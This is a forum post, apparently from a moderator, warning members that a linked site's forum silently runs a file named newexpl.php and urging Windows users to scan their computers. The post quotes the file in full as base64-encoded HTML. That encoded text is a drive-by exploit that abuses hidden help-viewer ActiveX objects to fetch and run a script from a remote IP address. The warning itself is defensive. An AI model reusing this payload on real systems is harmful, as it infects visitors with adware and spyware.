Whoever looked at this link (and especially the forum inside the linked website) and didn't use a real-time antivirus/antitrojan software, should definetely be worried.
I accessed the website and the forum with four different virus scanners and ALL of them gave an alert.
I tried to find out what actually happens and here is what I found: when accessing the forum on that website, a newexpl.php is automatically executed. This file contains the following:
From: <x> Subject: x MIME-Version: 1.0 Content-Type: text/html;
charset="utf-8" Content-Transfer-Encoding: base64
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4KPEhUTUw+PEJPRFk+
CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZSIgY2xhc3NpZD0iY2xz
aWQ6YWRiODgwYTYtZDhmZi0xMWNmLTkzNzctMDBhYTAwM2I3YTExIj4KPFBBUkFNIG5hbWU9
IkNvbW1hbmQiIHZhbHVlPSJSZWxhdGVkIFRvcGljcywgTUVOVSI+
CjxQQVJBTSBuYW1lPSJCdXR0b24iIHZhbHVlPSJUZXh0Ol8iPgo8UEFSQU0gbmFtZT0iV2lu
ZG93IiB2YWx1ZT0iJGdsb2JhbF9ibGFuayI+
CjxQQVJBTSBuYW1lPSJJdGVtMSIgdmFsdWU9ImNvbW1hbmQ7bXMtaXRzOmM6L3dpbmRvd3Mv
aGVscC9udHNoYXJlZC5jaG06Oi9hbHRfdXJsX2VudGVycHJpc2Vfc3BlY2lmaWMuaHRtIj4K
PC9PQkpFQ1Q+
CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZXIiIGNsYXNzaWQ9ImNs
c2lkOmFkYjg4MGE2LWQ4ZmYtMTFjZi05Mzc3LTAwYWEwMDNiN2ExMSI+
CjxQQVJBTSBuYW1lPSJDb21tYW5kIiB2YWx1ZT0iUmVsYXRlZCBUb3BpY3MsIE1FTlUiPgo8
UEFSQU0gbmFtZT0iQnV0dG9uIiB2YWx1ZT0iVGV4dDpfIj4KPFBBUkFNIG5hbWU9IldpbmRv
dyIgdmFsdWU9IiRnbG9iYWxfYmxhbmsiPgo8UEFSQU0gbmFtZT0iSXRlbTEiIHZhbHVlPSdj
b21tYW5kOyBqYXZhc2NyaXB0OmV4ZWNTY3JpcHQoImRvY3VtZW50LndyaXRlKFwiPHNjcmlw
dCBzcmM9aHR0cDovLzE5NS45NS4yMTguMTczL2RsL2FkdjQzOS9KUVRtdWRJLmpwZ1wiK1N0
cmluZy5mcm9tQ2hhckNvZGUoNjIpK1wiPC9zY3JcIitcImlwdFwiK1N0cmluZy5mcm9tQ2hh
ckNvZGUoNjIpKSIpJz4KPC9PQkpFQ1Q+CjxzY3JpcHQ+
YXNkcXdlLkhIQ2xpY2soKTtzZXRUaW1lb3V0KCJhc2Rxd2VyLkhIQ2xpY2soKSIsMTAwKTtz
ZXRUaW1lb3V0KCJkb2N1bWVudC53cml0ZSgnJykiLDIwMCk8L3NjcmlwdD48L0JPRFk+
PC9IVE1MPg==
Now guess what this is...
So if you went to this website and to the forum too, PLEASE scan your computer if you're using Windows!!!
This is actually a hijack attempt.
An online business based in Russia/Poland will pay websites 6 US cents for each machine they infect with adware and spyware.
We will NOT allow the posting of such links on Rennteam.com.